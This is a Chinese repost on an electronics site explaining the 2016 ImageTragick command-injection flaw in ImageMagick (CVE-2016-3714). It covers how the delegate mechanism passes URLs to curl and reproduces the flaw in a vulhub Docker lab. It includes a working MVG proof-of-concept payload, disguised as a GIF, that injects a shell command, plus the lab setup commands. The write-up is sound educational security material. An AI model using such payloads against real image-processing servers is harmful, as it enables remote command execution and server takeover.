搜索歷史

清空
搜索熱詞
      0
      • 聊天消息
      • 系統(tǒng)消息
      • 評論與回復(fù)
      VIP于 到期 續(xù)費
      登錄后你可以
      • 下載海量資料
      • 學(xué)習(xí)在線課程
      • 觀看技術(shù)視頻
      • 寫文章/發(fā)帖/加入社區(qū)
      會員中心
      創(chuàng)作中心
      發(fā)布
      創(chuàng)作活動

      完善資料讓更多小伙伴認識你,還能領(lǐng)取20積分哦,立即完善>

      3天內(nèi)不再提示

      一款使用量很廣的圖片處理程序ImageMagick

      Android編程精選 ? 來源:小白學(xué)黑客 ? 作者:小白哥 ? 2022-08-16 10:18 ? 次閱讀

      大家好,我是小白哥。

      這兩天,關(guān)于QQ盜號的安全事件相信大家已經(jīng)聽說了。各種各樣的傳言都有,一會兒數(shù)據(jù)庫泄露了,一會兒API漏洞了,一會兒又是協(xié)議漏洞了,還有的說掃描二維碼中招的,一時間眾說紛紜。

      在眾多說法中,我看到了一個:只要點擊圖片就會中招!

      好家伙,點圖片就能中招,這可厲害了,要是對方發(fā)來一些誘惑的圖片,年輕人把持不住那可咋整?

      真有那么懸乎嗎?

      這不禁讓我想起了幾年前的一個漏洞,也是圖片相關(guān)的,分享給大家看看。

      那次漏洞的主角,是ImageMagick。

      漏洞介紹

      漏洞名稱:Imagemagick 命令注入漏洞(CVE-2016-3714)

      漏洞定級:高危

      漏洞描述:ImageMagick 在處理惡意構(gòu)造的圖片文件時,對于文件中的 URL 未經(jīng)嚴格過濾,可導(dǎo)致命令注入漏洞。通過命令注入漏洞,黑客可以在服務(wù)器上執(zhí)行任意系統(tǒng)命令,獲取服務(wù)器權(quán)限。

      影響范圍:ImageMagick 6.9.3-9本身及以前所有版本

      漏洞原理

      ImageMagick是一款使用量很廣的圖片處理程序,很多廠商都調(diào)用了這個程序進行圖片處理,包括圖片的伸縮、切割、水印、格式轉(zhuǎn)換等等。

      但有研究者發(fā)現(xiàn),當用戶傳入一個包含『畸形內(nèi)容』的圖片的時候,就有可能觸發(fā)命令注入漏洞。

      國外的安全人員為此新建了一個網(wǎng)站:https://imagetragick.com/

      與這個漏洞相關(guān)的CVE有CVE-2016-3714、CVE-2016-3715、CVE-2016-3716CVE-2016-3717,

      其中最嚴重的就是CVE-2016-3714,利用這個漏洞可以造成遠程命令執(zhí)行的危害。

      ImageMagick有一個功能叫做delegate(委托),作用是調(diào)用外部的lib來處理文件。而調(diào)用外部lib的過程是使用系統(tǒng)的system命令來執(zhí)行的

      參考代碼:https://github.com/ImageMagick/ImageMagick/blob/e93e339c0a44cec16c08d78241f7aa3754485004/MagickCore/delegate.c#L347

      我們在ImageMagick的默認配置文件里可以看到所有的委托:/etc/ImageMagick/delegates.xml漏洞報告中給出的POC是利用了如下的這個委托:

      "https"command=""curl"-s-k-o"%o""https:%M""/>

      它在解析https圖片的時候,使用了curl命令將其下載,我們看到%M被直接放在curl的最后一個參數(shù)內(nèi)。

      ImageMagick默認支持一種圖片格式,叫mvg,而mvg與svg格式類似,其中是以文本形式寫入矢量圖的內(nèi)容,而這其中就可以包含https處理過程。

      所以我們可以構(gòu)造一個.mvg格式的圖片(但文件名可以不為.mvg,比如下圖中包含payload的文件的文件名為vul.gif,而ImageMagick會根據(jù)其內(nèi)容識別為mvg圖片),并在https://后面閉合雙引號,寫入自己要執(zhí)行的命令:

      pushgraphic-context
viewbox00640480
fill‘url(https://"|id;")’
popgraphic-context

      這樣,ImageMagick在正常執(zhí)行圖片轉(zhuǎn)換、處理的時候就會觸發(fā)漏洞。

      漏洞復(fù)現(xiàn)

      • 搭建靶機,教程:https://github.com/vulhub/vulhub/tree/master/imagemagick/imagetragick
      • 下載vulhub:git clone https://github.com/vulhub/vulhub/tree/master/imagemagick/imagetragick
      • 進入目錄:cd /vulhub-master/imagemagick/imagetragick
      • 啟動docker:docker-compose up -d 注意 我靶機 docker-compose.yml中端口為8888
      6c4e0e0c-1cf7-11ed-ba43-dac502259ad0.png
      • 訪問搭建的靶機ip:8888
      6c62c91e-1cf7-11ed-ba43-dac502259ad0.png
      • 上傳poc,新建一個txt文件,內(nèi)容為:
      pushgraphic-context
viewbox00640480
fill'url(https://"|id;")'
popgraphic-context

      將文件保存為poc.gif

      6c79b7a0-1cf7-11ed-ba43-dac502259ad0.png

      上次poc.gif,點擊提交,成功執(zhí)行:

      6c91dbf0-1cf7-11ed-ba43-dac502259ad0.png

      這年頭,除了鏈接,圖片也不敢隨便亂點了···

      ————————————————

      漏洞原理和復(fù)現(xiàn)部分原文鏈接:https://blog.csdn.net/u011975363/article/details/118031227

      審核編輯 :李倩


      聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請聯(lián)系本站處理。 舉報投訴
      • 數(shù)據(jù)庫
        +關(guān)注

        關(guān)注

        7

        文章

        3752

        瀏覽量

        64233
      • 漏洞
        +關(guān)注

        關(guān)注

        0

        文章

        203

        瀏覽量

        15352
      • 圖片處理
        +關(guān)注

        關(guān)注

        0

        文章

        16

        瀏覽量

        6845

      原文標題:看圖片也能中招!

      文章出處:【微信號:AndroidPush,微信公眾號:Android編程精選】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。

      收藏 人收藏

        評論

        相關(guān)推薦

        如果設(shè)計一款桌面的機器玩具,最吸引人的外觀與功能要有哪些?

        初步設(shè)想制作如下其中一款,有感興趣的朋友可以幫提提意見。 A一款圓敦敦的音響狀的“個人日程助手”,具備番茄鬧鐘、音樂播放、減壓交互、語言對話、工作日報生成。 B一款迷你瓦利機器人,有
        發(fā)表于 10-19 18:25

        經(jīng)過TAS5548EVM評估板處理輸出的PWM信號,可以用哪一款型號的數(shù)字功放評估板處理?

        您好,我想了解下,經(jīng)過TAS5548EVM評估板處理輸出的PWM信號,可以用哪一款型號的數(shù)字功放評估板處理?用TAS5631系列的板子處理
        發(fā)表于 10-18 07:13

        我想選一款音頻芯片,性能類似TAS2505-Q1的,帶有音頻處理和D類功放功能二合

        TI工程師你好!我想選一款音頻芯片,性能類似TAS2505-Q1的,帶有音頻處理和D類功放功能二合的,輸出功率是20~30W單路雙路輸出都可以,是否有這樣的芯片可選。謝謝!
        發(fā)表于 10-09 07:32

        基于ArkTS語言的OpenHarmony APP應(yīng)用開發(fā):圖片處理

        1、程序介紹本案例使用TextArea實現(xiàn)多文本輸入,使用mediaLibrary實現(xiàn)在相冊中獲取圖片,使用image生成pixelMap,使用pixelMap的scale(),crop
        的頭像 發(fā)表于 09-20 08:07 ?345次閱讀
        基于ArkTS語言的OpenHarmony APP應(yīng)用開發(fā):<b class='flag-5'>圖片</b><b class='flag-5'>處理</b>

        選用一款運放搭建單位增益運算放大電路遇到的問題求解

        當選用一款運放搭建單位增益運算放大電路的時候,經(jīng)常遇到下面的問題,不知道這個問題的來源是什么? 輸入信號: 這是正弦信號是比較理想的,波形不存在問題。 輸出信號(下面的三幅圖片為依次放大后的情況): 可以看到,在輸出信號的波形中,存在細小的波紋。 那么,這種現(xiàn)實是
        發(fā)表于 08-22 06:32

        INA-138設(shè)計了一款電路,取樣后1腳的輸出不是個穩(wěn)定的電平,如何處理?

        設(shè)計了一款電路,使用到INA-138 ,SOT-23封裝,取樣后1腳的輸出不是個穩(wěn)定的電平,如何處理?
        發(fā)表于 08-12 06:51

        如何設(shè)計一款50HZ陷波電路?

        如何設(shè)計一款50HZ陷波電路,有現(xiàn)成的參考電路設(shè)計嗎
        發(fā)表于 07-30 06:12

        人工智能模型公司Anthropic近日推出了一款Claude移動端App

        制造Claude 3人工智能模型公司Anthropic近日推出了一款iOS應(yīng)用程序,并為群組共享模型訪問添加第二個付費層。
        的頭像 發(fā)表于 05-08 09:55 ?603次閱讀

        百度搜索重磅推出AI圖片助手

        近日,百度搜索全新上線了一款名為“百度AI圖片助手”的智能工具,該工具賦予了用戶處理圖片的強大能力。無論是搜索中的
        的頭像 發(fā)表于 05-06 10:20 ?1253次閱讀

        介紹一款基于java的滲透測試神器-CobaltStrike

        Cobalt Strike是一款基于java的滲透測試神器,常被業(yè)界人稱為CS神器。
        的頭像 發(fā)表于 01-16 09:16 ?856次閱讀
        介紹<b class='flag-5'>一款</b>基于java的滲透測試神器-CobaltStrike

        共模電容:又一款EMC濾波神器?

        共模電容:又一款EMC濾波神器?|深圳比創(chuàng)達電子(上)
        的頭像 發(fā)表于 12-25 10:54 ?664次閱讀
        共模電容:又<b class='flag-5'>一款</b>EMC濾波神器?

        介紹一款IDEA插件:Apipost-Helper-2.0

        IDEA是一款功能強大的集成開發(fā)環(huán)境(IDE)插件,它可以幫助開發(fā)人員更加高效地編寫、調(diào)試和部署軟件應(yīng)用程序。
        的頭像 發(fā)表于 12-06 10:47 ?725次閱讀
        介紹<b class='flag-5'>一款</b>IDEA插件:Apipost-Helper-2.0

        如何選擇一款真對數(shù)放大器?

        想選擇一款真對數(shù)放大器,用來實現(xiàn)接收機的動態(tài)范圍的壓縮,信號頻率為10M, 壓縮前動態(tài)范圍為120dB, 想通過放大器壓縮到70dB范圍內(nèi)? 請推薦幾芯片? 謝謝
        發(fā)表于 11-22 08:23

        設(shè)計一款病房無線呼叫系統(tǒng)電路

        電子發(fā)燒友網(wǎng)站提供《設(shè)計一款病房無線呼叫系統(tǒng)電路.rar》資料免費下載
        發(fā)表于 11-17 15:58 ?1次下載
        設(shè)計<b class='flag-5'>一款</b>病房無線呼叫系統(tǒng)電路

        一款低功耗LED燈驅(qū)動電路原理介紹

        電子發(fā)燒友網(wǎng)站提供《一款低功耗LED燈驅(qū)動電路原理介紹.doc》資料免費下載
        發(fā)表于 11-14 11:23 ?0次下載
        <b class='flag-5'>一款</b>低功耗LED燈驅(qū)動電路原理介紹